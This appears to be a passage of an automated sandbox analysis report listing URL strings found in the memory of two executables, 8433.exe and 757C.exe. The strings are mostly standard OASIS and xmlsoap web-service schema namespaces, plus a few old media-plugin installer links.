                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgement
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequence
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequenceResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/fault
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1$
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/sct
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512#BinarySecret
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/AsymmetricKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/CK/PSHA1
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Nonce
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Issue
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Aborted
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Commit
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Committed
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Completion
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PC
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepare
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepared
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/ReadOnly
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Replay
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Rollback
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Volatile2PC
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/fault
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContext
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContextResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/Register
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/fault
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: http://forms.rea
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677435791.0000000003726000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: http://go.micros
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
